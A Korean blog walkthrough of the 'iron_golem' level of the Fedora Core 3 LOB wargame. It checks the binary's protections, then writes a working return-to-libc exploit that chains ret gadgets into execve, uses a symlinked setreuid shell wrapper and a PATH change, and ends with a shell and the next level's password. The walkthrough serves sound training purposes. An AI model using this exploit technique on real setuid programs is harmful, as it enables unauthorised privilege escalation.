첫 문제이니 만큼 환경분석부터 시작하겠다.

Fedora core 3 환경분석

Stack Dummy : O

 

[gate@Fedora_1stFloor ~]$ gcc -v

Reading specs from /usr/lib/gcc/i386-redhat-linux/3.4.2/specs

Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-java-awt=gtk --host=i386-redhat-linux

Thread model: posix

gcc version 3.4.2 20041017 (Red Hat 3.4.2-6.fc3)  //2.96버전이상은 dummy 존재

 

[gate@Fedora_1stFloor ~]$ gdb -q iron_golem

(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x080483d0 <main+0>:    push   ebp

0x080483d1 <main+1>:    mov    ebp,esp

0x080483d3 <main+3>:    sub    esp,0x108

0x080483d9 <main+9>:    and    esp,0xfffffff0

0x080483dc <main+12>:   mov    eax,0x0

0x080483e1 <main+17>:   add    eax,0xf

0x080483e4 <main+20>:   add    eax,0xf

0x080483e7 <main+23>:   shr    eax,0x4

0x080483ea <main+26>:   shl    eax,0x4

0x080483ed <main+29>:   sub    esp,eax    //스택 더미를 형성하는 과정

0x080483ef <main+31>:   cmp    DWORD PTR [ebp+8],0x1

0x080483f3 <main+35>:   jg     0x804840f <main+63>

0x080483f5 <main+37>:   sub    esp,0xc

0x080483f8 <main+40>:   push   0x8048524

0x080483fd <main+45>:   call   0x80482f8 <_init+56>

0x08048402 <main+50>:   add    esp,0x10

0x08048405 <main+53>:   sub    esp,0xc

0x08048408 <main+56>:   push   0x0

0x0804840a <main+58>:   call   0x8048308 <_init+72>

0x0804840f <main+63>:   sub    esp,0x8

0x08048412 <main+66>:   mov    eax,DWORD PTR [ebp+12]

0x08048415 <main+69>:   add    eax,0x4

0x08048418 <main+72>:   push   DWORD PTR [eax]

0x0804841a <main+74>:   lea    eax,[ebp-264]

0x08048420 <main+80>:   push   eax

0x08048421 <main+81>:   call   0x8048318 <_init+88>

0x08048426 <main+86>:   add    esp,0x10

0x08048429 <main+89>:   sub    esp,0x8

0x0804842c <main+92>:   lea    eax,[ebp-264]

0x08048432 <main+98>:   push   eax

0x08048433 <main+99>:   push   0x8048530

0x08048438 <main+104>:  call   0x80482f8 <_init+56>

0x0804843d <main+109>:  add    esp,0x10

---Type <return> to continue, or q <return> to quit---

0x08048440 <main+112>:  leave

0x08048441 <main+113>:  ret

0x08048442 <main+114>:  nop

0x08048443 <main+115>:  nop

End of assembler dump.

 

Down privileage of bash : O

 

 

 

Random Stack : O

 

[gate@Fedora_1stFloor ~]$ cat /proc/sys/kernel/exec-shield-randomize

1

[gate@Fedora_1stFloor ~]$ cat > ASLR_test.c

unsigned long getEBP(void){

        asm("movl %ebp,%eax");

}

int main(void){

        printf("EBP:%x\n",getEBP());

}

[gate@Fedora_1stFloor ~]$ gcc -o ASLR_test ASLR_test.c

[gate@Fedora_1stFloor ~]$ ./ASLR_test

EBP:fef3d600

[gate@Fedora_1stFloor ~]$ ./ASLR_test

EBP:fee85660

[gate@Fedora_1stFloor ~]$ ./ASLR_test

EBP:fef699b0

[gate@Fedora_1stFloor ~]$ ./ASLR_test

EBP:fee30e40

[gate@Fedora_1stFloor ~]$ ./ASLR_test

EBP:fee43770

 

 

Random Library : X

 

[gate@Fedora_1stFloor ~]$ cat /proc/self/maps | grep -e libc

0071c000-0083d000 r-xp 00000000 fd:00 68708      /lib/tls/libc-2.3.3.so

0083d000-0083f000 r--p 00120000 fd:00 68708      /lib/tls/libc-2.3.3.so

0083f000-00841000 rw-p 00122000 fd:00 68708      /lib/tls/libc-2.3.3.so

[gate@Fedora_1stFloor ~]$ cat /proc/self/maps | grep -e libc

0071c000-0083d000 r-xp 00000000 fd:00 68708      /lib/tls/libc-2.3.3.so

0083d000-0083f000 r--p 00120000 fd:00 68708      /lib/tls/libc-2.3.3.so

0083f000-00841000 rw-p 00122000 fd:00 68708      /lib/tls/libc-2.3.3.so

[gate@Fedora_1stFloor ~]$ cat /proc/self/maps | grep -e libc

0071c000-0083d000 r-xp 00000000 fd:00 68708      /lib/tls/libc-2.3.3.so

0083d000-0083f000 r--p 00120000 fd:00 68708      /lib/tls/libc-2.3.3.so

0083f000-00841000 rw-p 00122000 fd:00 68708      /lib/tls/libc-2.3.3.so   //라이브러리의 주소가 변하지 않는다.

 

Random Program Binary Mapped : X

 

 

ASCII Armor : O

 

[gate@Fedora_1stFloor ~]$ cat /proc/self/maps

00703000-00718000 r-xp 00000000 fd:00 68707      /lib/ld-2.3.3.so  //주소값 최상위 1바이트가 NULL

00718000-00719000 r--p 00014000 fd:00 68707      /lib/ld-2.3.3.so

00719000-0071a000 rw-p 00015000 fd:00 68707      /lib/ld-2.3.3.so

0071c000-0083d000 r-xp 00000000 fd:00 68708      /lib/tls/libc-2.3.3.so

0083d000-0083f000 r--p 00120000 fd:00 68708      /lib/tls/libc-2.3.3.so

0083f000-00841000 rw-p 00122000 fd:00 68708      /lib/tls/libc-2.3.3.so

00841000-00843000 rw-p 00841000 00:00 0

08048000-0804c000 r-xp 00000000 fd:00 228524     /bin/cat

0804c000-0804d000 rw-p 00003000 fd:00 228524     /bin/cat

08863000-08884000 rw-p 08863000 00:00 0

f6df8000-f6ff8000 r--p 00000000 fd:00 558549     /usr/lib/locale/locale-archive

f6ff8000-f6ff9000 rw-p f6ff8000 00:00 0

fef52000-ff000000 rw-p fef52000 00:00 0

ffffe000-fffff000 ---p 00000000 00:00 0

 

 

Non-Executable Stack : O

 

[gate@Fedora_1stFloor ~]$ cat /proc/sys/kernel/exec-shield

1

 

[gate@Fedora_1stFloor ~]$ readelf -l iron_golem

 

Elf file type is EXEC (Executable file)

Entry point 0x8048328

There are 7 program headers, starting at offset 52

 

Program Headers:

  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align

  PHDR           0x000034 0x08048034 0x08048034 0x000e0 0x000e0 R E 0x4

  INTERP         0x000114 0x08048114 0x08048114 0x00013 0x00013 R   0x1

      [Requesting program interpreter: /lib/ld-linux.so.2]

  LOAD           0x000000 0x08048000 0x08048000 0x00538 0x00538 R E 0x1000

  LOAD           0x000538 0x08049538 0x08049538 0x00108 0x0010c RW  0x1000

  DYNAMIC        0x00054c 0x0804954c 0x0804954c 0x000c8 0x000c8 RW  0x4

  NOTE           0x000128 0x08048128 0x08048128 0x00020 0x00020 R   0x4

  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4 실행권한인 E 없다

 

 Section to Segment mapping:

  Segment Sections...

   00

   01     .interp

   02     .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame

   03     .ctors .dtors .jcr .dynamic .got .got.plt .data .bss

   04     .dynamic

   05     .note.ABI-tag

   06

 

Non-Executable Heap : O

 

[gate@Fedora_1stFloor ~]$ readelf -l iron_golem

 

Elf file type is EXEC (Executable file)

Entry point 0x8048328

There are 7 program headers, starting at offset 52

 

Program Headers:

  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align

  PHDR           0x000034 0x08048034 0x08048034 0x000e0 0x000e0 R E 0x4

  INTERP         0x000114 0x08048114 0x08048114 0x00013 0x00013 R   0x1

      [Requesting program interpreter: /lib/ld-linux.so.2]

  LOAD           0x000000 0x08048000 0x08048000 0x00538 0x00538 R E 0x1000

  LOAD           0x000538 0x08049538 0x08049538 0x00108 0x0010c RW  0x1000

  DYNAMIC        0x00054c 0x0804954c 0x0804954c 0x000c8 0x000c8 RW  0x4 //실행권한이 없음

  NOTE           0x000128 0x08048128 0x08048128 0x00020 0x00020 R   0x4

  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4

 

 Section to Segment mapping:

  Segment Sections...

   00

   01     .interp

   02     .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame

   03     .ctors .dtors .jcr .dynamic .got .got.plt .data .bss

   04     .dynamic

   05     .note.ABI-tag

   06

 

Stack Carany : X

 

[gate@Fedora_1stFloor ~]$ gdb -q iron_golem

(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x080483d0 <main+0>:    push   ebp

0x080483d1 <main+1>:    mov    ebp,esp

0x080483d3 <main+3>:    sub    esp,0x108

0x080483d9 <main+9>:    and    esp,0xfffffff0

0x080483dc <main+12>:   mov    eax,0x0

0x080483e1 <main+17>:   add    eax,0xf

0x080483e4 <main+20>:   add    eax,0xf

0x080483e7 <main+23>:   shr    eax,0x4

0x080483ea <main+26>:   shl    eax,0x4

0x080483ed <main+29>:   sub    esp,eax

0x080483ef <main+31>:   cmp    DWORD PTR [ebp+8],0x1

0x080483f3 <main+35>:   jg     0x804840f <main+63>

0x080483f5 <main+37>:   sub    esp,0xc

0x080483f8 <main+40>:   push   0x8048524

0x080483fd <main+45>:   call   0x80482f8 <_init+56>

0x08048402 <main+50>:   add    esp,0x10

0x08048405 <main+53>:   sub    esp,0xc

0x08048408 <main+56>:   push   0x0

0x0804840a <main+58>:   call   0x8048308 <_init+72>

0x0804840f <main+63>:   sub    esp,0x8

0x08048412 <main+66>:   mov    eax,DWORD PTR [ebp+12]

0x08048415 <main+69>:   add    eax,0x4

0x08048418 <main+72>:   push   DWORD PTR [eax]

0x0804841a <main+74>:   lea    eax,[ebp-264]

0x08048420 <main+80>:   push   eax

0x08048421 <main+81>:   call   0x8048318 <_init+88>

0x08048426 <main+86>:   add    esp,0x10

0x08048429 <main+89>:   sub    esp,0x8

0x0804842c <main+92>:   lea    eax,[ebp-264]

0x08048432 <main+98>:   push   eax

0x08048433 <main+99>:   push   0x8048530

0x08048438 <main+104>:  call   0x80482f8 <_init+56>

0x0804843d <main+109>:  add    esp,0x10

---Type <return> to continue, or q <return> to quit---

0x08048440 <main+112>:  leave

0x08048441 <main+113>:  ret                                               //Canary 보이지 않는다.

0x08048442 <main+114>:  nop

0x08048443 <main+115>:  nop

End of assembler dump.

 

Stack Smashing Protector : X

 

[gate@Fedora_1stFloor ~]$ gdb -q iron_golem

(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x080483d0 <main+0>:    push   ebp

0x080483d1 <main+1>:    mov    ebp,esp

0x080483d3 <main+3>:    sub    esp,0x108

0x080483d9 <main+9>:    and    esp,0xfffffff0

0x080483dc <main+12>:   mov    eax,0x0

0x080483e1 <main+17>:   add    eax,0xf

0x080483e4 <main+20>:   add    eax,0xf

0x080483e7 <main+23>:   shr    eax,0x4

0x080483ea <main+26>:   shl    eax,0x4

0x080483ed <main+29>:   sub    esp,eax

0x080483ef <main+31>:   cmp    DWORD PTR [ebp+8],0x1

0x080483f3 <main+35>:   jg     0x804840f <main+63>

0x080483f5 <main+37>:   sub    esp,0xc

0x080483f8 <main+40>:   push   0x8048524

0x080483fd <main+45>:   call   0x80482f8 <_init+56>

0x08048402 <main+50>:   add    esp,0x10

0x08048405 <main+53>:   sub    esp,0xc

0x08048408 <main+56>:   push   0x0

0x0804840a <main+58>:   call   0x8048308 <_init+72>

0x0804840f <main+63>:   sub    esp,0x8

0x08048412 <main+66>:   mov    eax,DWORD PTR [ebp+12]

0x08048415 <main+69>:   add    eax,0x4

0x08048418 <main+72>:   push   DWORD PTR [eax]

0x0804841a <main+74>:   lea    eax,[ebp-264]

0x08048420 <main+80>:   push   eax

0x08048421 <main+81>:   call   0x8048318 <_init+88>

0x08048426 <main+86>:   add    esp,0x10

0x08048429 <main+89>:   sub    esp,0x8

0x0804842c <main+92>:   lea    eax,[ebp-264]

0x08048432 <main+98>:   push   eax

0x08048433 <main+99>:   push   0x8048530

0x08048438 <main+104>:  call   0x80482f8 <_init+56>

0x0804843d <main+109>:  add    esp,0x10

---Type <return> to continue, or q <return> to quit---

0x08048440 <main+112>:  leave

0x08048441 <main+113>:  ret                                               //__stack_chk_fail 보이지 않는다

0x08048442 <main+114>:  nop

0x08048443 <main+115>:  nop

End of assembler dump.

 

 

일단 이번 페도라 LOB 되도록이면 브루트포스 공격은 삼가도록 하겟다.

 

일단 NX stack 이기 때문에 환경변수 공격은 사용 없고 나머지 스택을 이용한 공격도 통하지 않는다.

 

그래서 RTL공격을 사용할려고 했는데, ascii armor 때문에 인자를 뒤에 원래 스택에 위치해있는 쓰레기 값으로 심볼릭 링크를 사용해서 이용해야한다.

 

[gate@Fedora_1stFloor ~]$ cp iron_golem iron_gole1

[gate@Fedora_1stFloor ~]$ gdb -q iron_gole1

(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) b main

Breakpoint 1 at 0x80483d9

(gdb) r

Starting program: /home/gate/iron_gole1

(no debugging symbols found)...(no debugging symbols found)...

Breakpoint 1, 0x080483d9 in main ()

(gdb) x/40x $ebp

0xfeed0e48:     0xfeed0ea8      0x00730e33      0x00000001      0xfeed0ed4

0xfeed0e58:     0xfeed0edc      0x0070eab6      0x0083eff4      0x00000000    //스택 바깥의 고정된 2개의 주소중 하나를 인자로 사용 //더짧은것을 사용하는게 좋다.

0xfeed0e68:     0xfeed0e60      0xfeed0ea8      0xfeed0e50      0x00730df5

0xfeed0e78:     0x00000000      0x00000000      0x00000000      0x00718fb4

0xfeed0e88:     0x00000001      0x08048328      0x00000000      0x0070e9f0

0xfeed0e98:     0x0070f340      0x00718fb4      0x00000001      0x08048328

0xfeed0ea8:     0x00000000      0x08048349      0x080483d0      0x00000001

0xfeed0eb8:     0xfeed0ed4      0x08048444      0x08048498      0x0070f340

0xfeed0ec8:     0xfeed0ecc      0x00715e31      0x00000001      0xfef68c20

0xfeed0ed8:     0x00000000      0xfef68c36      0xfef68c4f      0xfef68c5f

(gdb) x/s  0x0070eab6

0x70eab6 <fixup+150>:    "\213Uð\203ì\024\211Á1À\205Òt\v\205ÉtL\213B\004\2131\001ð\213»øüÿÿ\205ÿu\005\213Mä\211\001\215eô[^_]Ã\213Mè\213@\004\017·\004H\213\216\210\001"

(gdb) x/s  0x0083eff4          // 짧다.

0x83eff4 <svcauthsw+712>:        "<í\203"

(gdb) x/x 0x0083eff4

0x83eff4 <svcauthsw+712>:       0x0083ed3c

(gdb) quit

The program is running.  Exit anyway? (y or n) y

[gate@Fedora_1stFloor ~]$ cat > sh.c

#include <stdio.h>

#include <stdlib.h>

 

int main()

{

        setreuid(geteuid(),geteuid());

        setregid(getegid(),getegid());

        system("/bin/sh");

}

[gate@Fedora_1stFloor ~]$ gcc -o sh sh.c

[gate@Fedora_1stFloor ~]$ ln -s sh `perl -e 'print "\x3c\xed\x83"'`

[gate@Fedora_1stFloor ~]$ export PATH=./:$PATH     //환경변수 PATH 앞에다 현재폴더를 추가해준다.

 

#####payload 작성 ###########

 

*dummy확인하기

[gate@Fedora_1stFloor ~]$ gdb -q iron_golem

(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) b *main+31

Breakpoint 1 at 0x80483ef

(gdb) r

Starting program: /home/gate/iron_golem

(no debugging symbols found)...(no debugging symbols found)...

Breakpoint 1, 0x080483ef in main ()

(gdb) set $x=$ebp-$esp

(gdb) print $x

$1 = 280

그런데 처음에 264byte만큼 버퍼를 할당 하였으니까 dummy 크기는 16byte 된다.

['a' * 268][&ret *3][execve]   --> system함수를 안쓰는 이유는

system() 함수는 내부 루틴중에 geteuid 를 재설정 해주는 부분이 있기 때문에 이를 유지 할 수 없다. 따라서 system 함수의 주소값 대신에 execve 주소값을 찾아 줘야 한다. 

#########################

 

 

 

[gate@Fedora_1stFloor ~]$ ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x3,"\x90\x54\x7a\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAATz

sh-3.00$ id

uid=501(iron_golem) gid=501(iron_golem) groups=500(gate) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 501

blood on the fedora







Posted by Sanguine